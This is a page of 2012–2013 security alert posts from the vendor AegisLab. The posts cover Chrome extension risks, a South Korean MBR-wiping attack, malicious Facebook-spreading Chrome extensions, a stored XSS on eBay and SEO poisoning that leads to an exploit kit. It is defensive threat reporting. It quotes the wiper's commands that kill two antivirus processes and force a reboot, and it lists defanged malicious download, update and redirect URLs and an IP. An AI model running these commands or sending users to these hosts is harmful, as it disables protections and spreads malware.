[ Security Alert ] 26 March, 2013 15:45

    Several weeks ago, all security researchers failed to crack Google's Chrome OS at CanSecWest Pwnium3 in Vancouver, even the deadline extended from 2pm to 5pm due to researchers' request. But, unfortunately, the Chrome browser was compromised by MWR Labs at Pwn2Own 2013 which sponsored by HP and Google. This contest proves that Google Chrome was vulnerable.

Following is our analysis for chrome browser security:

 

 

    Chrome browser was developed by Google and now is one of the most popular web browser in the world. It includes Google search, youtube and many Google proprietary services. In personalization, Chrome web store provides abounding extensions to modify and enhance the functionality of the Chrome browser. 

    Extensions are small software programs and bundle all their files (manifest.json, picture, js and CSS...) into a single file that the user downloads and installs. This bundling means that, unlike ordinary web apps, extensions don't need to depend on content from the web.

 

 

manifest.json provides important information including name, description, version, language and permission...

The following code shows the supported manifest fields. (http://developer.chrome.com/extensions/manifest.html )

 

 

The only fields that are always required are name and version. Here we take content_scripts, permissions and update_url to explain the attribute and function as following:

content_scripts: They are JavaScript files that run in the context of web pages. By using the standard Document Object Model (DOM), they can read details of the web pages the browser visits, or make changes to them.

update_url: Setting URL for update checking

permissions: To use most chrome.* APIs and extension capabilities, your extension must declare its intent in the manifest, often in the "permissions" field. For example, Google mail Checker mush have 2 permissions as following:

1. access your data on *google.com

2. access your tabs and browsing activity 

 

  

 

 

    An user might see a dialog for permission request when installing an extension. If the permission improperly assigned and content_scripts include malicious code, the extension can do anything to your system.

    For example:  Malicious extension auto posts and spreads malicious links on Facebook. (Security Alert 2013-02-06: Watch out for Facebook video link). Also, the malicious extension will auto update by “update_url” setting to change to another hacking jobs.

 

    Chrome browser adds extension function from version 4.0. The extension was easy to develop, but also easy to exploit. Old version of google Chrome permits related extensions auto setup when Windows application installing. It is easy to install malicious extensions to victim's system without user permission

 

    So, google chrome enhances extension management from ver 25.0. Only extensions from Chrome Web Store are available and no more auto installation. Every extension must be permitted by user before installation. However, there can be no assurance that all extensions in Chrome Web Store are secure.

 

    On faceook, the attacker pretends to be victim's friend which shares attractive themes to lure victims to click the hyper link and install malicious extension. Then the victim will post many malicious link to his friends. So the malicious extensions spread constantly by victim's curiosity. The victim misunderstood his account was stolen and changed password, but it was not workable. The victim has to remove malicious extension from chrome browser.

    For more detail scenario, please refer to our previous post: 

Security Alert 2013-02-06: Watch out for Facebook video link

Security Alert 2013-02-22: Malicious Chrome extensions   

 

    Web browser plug-ins are additional pieces of software that add extra capabilities to your web browser, such as the ability to view movies, run Java applets, or see Flash animations. Unfortunately, since plug-ins run with all the privileges of real applications, they can do absolutely anything to your computer. The year past, so many 0-day vulnerabilities were reported in Java and many security experts strongly recommend disabling it. 

 

    As seen from the above analysis, the Extensions and Plug-ins are two vulnerable points in Chrome browser. For Chrome more secure, Google Web Store should inspect all extensions strictly, moreover, we would like to remind our customer:

1.Do not install any extensions from untrusted resource. 

2.Notice that permission request is normal or not when extension installing.

3.Do not install unnecessary plug-ins as possible. If your have any plug-in installed, keep up to date. 

 

by AegisLab

 

[ Security Alert ] 21 March, 2013 15:33

  As many of you would probably know several South Korean banks and local media organizations have been impacted by a critical cyber attack. The all victims did not boot anymore.

 

 

 

 

AegisLab has got the virus samples from crashing of computer network of major South Korean banks and TV Broadcasters. 

As the sample we got, the virus overwrites the system's MBR (Master Boot Record) with string "HASTATI".

 

 

The partition table was also destroied.

 

 

The virus include 3 jobs as following:

1. taskkill /F /IM pasvc.exe  => terminate %u300CAhnLab Policy Agent%u300D. (Top Anti-Virus software in South Korea)

2. taskkill /F /IM Clisvc.exe  => terminate%u300CViRobot%u300D(Famous Anti-Virus software in South Korea) 

3. shutdown -r -t 0  => reboot immediately  

 

Obviously, the attack was focus on South Korea.

 

After executing "shutdown -r -t 0" , the blue death screen appears ...

 

 

reboot and then...

 

 

For your internet security, we urge our anti-virus customer to keep signature up to date as possible.

by AegisLab

 

[ Security Alert ] 22 February, 2013 16:17

Following previous post, we have found some malicious extensions in Chrome browser to turn Likes into real results on Facebook.

Once you click the malicious links embedded in spam mail, messages or any hyperlinks, and download the extensions, the malware monitor your browser activity. If you are logged into Facebook with Chrome browser, it will GET hxxp://goo.gl/iiWeL? (also hxxp://fastotolike.com/yeni.php!)

The content of son.js in extension as following:

 

 

There two functions abone and sayfa2 in "hxxp://fastotolike.com/yeni.php", the partial content as below:

 

The function abone is tracking someone:

 

 

The function sayfa2 is turning Likes for someone:

 

 

Why did malwares turn Likes on Facebook? As we know, "On underground forums in Russia, a page with 100,000 likes sells for about $150 to $200", a security researcher said. Yes, for the money obviously. 

 

For your internet browsing security and prevent malicious connection, we urge our customer to keep WebGuard signature up to date. 

by AegisLab," 

 

[ Security Alert ] 06 February, 2013 13:45

AegisLab got some malicious video links from Facebook as following:

hxxp://www.facebook.com/pages/Videos-choquantes/115875135259062?sk=app_208195102528120

hxxp://www.facebook.com/pages/Videos-choquantes/116032281910520?sk=app_208195102528120  

 

They all take advantage of your curiosity for unknown video, and lure you to execute malicious package

The analysis as below: 

 

 

   

The subject is "This girl has a spider under the skin and makes it removed!"  and the messages shown in pop up window: 

Update Needed

to watch the latest videos on Facebookyou must install this update package.

To begin, click on the button below:  

   

Obviously, the devil wants to lure you to execute the malware.

If "OK" button clicked, you'll get a malicious file: hxxp://dl-b.uni.me/updates/fr_FR /fb13.4.4_fr.exe

  

 

After running this file, the message "update already done" shown in pop up window as following: 

  

 

 

And then browser Chorme was added one more extension:

  

 

the content of this extension

  

 

Chrome's extension was defined the  by manifest.json, and this extension was malicious scripts injected.

  

 

To analyze manifest.json, we found:

1. permission: allow any URL connection

2. main program: call.js

3. malicious URL for update: http://du-pont.info/updates/fr_FR/update.xml

  

 

 

The partial main program call.js:

  

   

The malicious extension will collect your contacts in facebook and add to fans, and then spreads malicious links to them.

The best way to lower down the risk from malicious links is checking browser's status bar before clicking OK button as possible.

For your internet browsing security and prevent malicious connection, we urge our customer to keep WebGuard signature up to date. 

 

by AegisLab 

 

[ Security Alert ] 16 November, 2012 11:27

An Indian security researcher Shubham Upadhyay aka Cyb3R_Shubh4M, reported a new permanent XSS affecting the products listings on eBay.com. 

AegisLab also test again immediately, so far, this vulnerability is currently unfixed!!

Here is the page with XSS injection code: 

 

 

For this flaw, you need a eBay seller account, login to your account on eBay and create a listing for sale. Then put XSS code into HTML.

 

 

  

 

The news of XSS vulnerabilities is nothing new, but still so dangerous. What are the threats of XSS? Everything from account hijacking, shopping, payment, changing of user settings, cookie theft/poisoning, or false advertising is possible.

 

by AegisLab

 

[ Security Alert ] 12 November, 2012 18:57

AgeisLab found a URLwww.hv20.com/payroll/djia-finance.php was posioned by Blackhat SEO.

The attack scenario as following:

Google search -> djia finance

-> hxxp://www.hv20.com/payroll/djia-finance.php

-> hopping site -> hxxp://78.159.118.51/in.cgi?10

-> the final download site -> hxxp://proddingappsumo.info/guaranteeing/means_phone- pool_occurs.php?tjn=33:2v:1h:2w:1m&wrgglxs=38&ciooh=33:30:32:2w:30:1n:31:1f:1m:1i&zuhy=1n:1d:1g:1d:1h:1d:1f

!! (attempt to download a malicious pdf file) !! 

Virustotal scan result (3/44): 

https://www.virustotal.com/file/e7c42a18ff9a8acdd4eb9f5808ec5bd5cafac1cd8ca6ac1ef6b71cdfe2106f67/analysis/1352442238/ 

 

As our analysis and observation, this download site format made by Blackhole Exploit Kit 2.0.

So far, this "djia finance" Blackhat SEO poisoning still keep alive and no any warning message in Google search results. 

 

 

 

AegisLab urge our customer to keep WG signature in latest version.


by AegisLab WG Team 

 

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15  Next»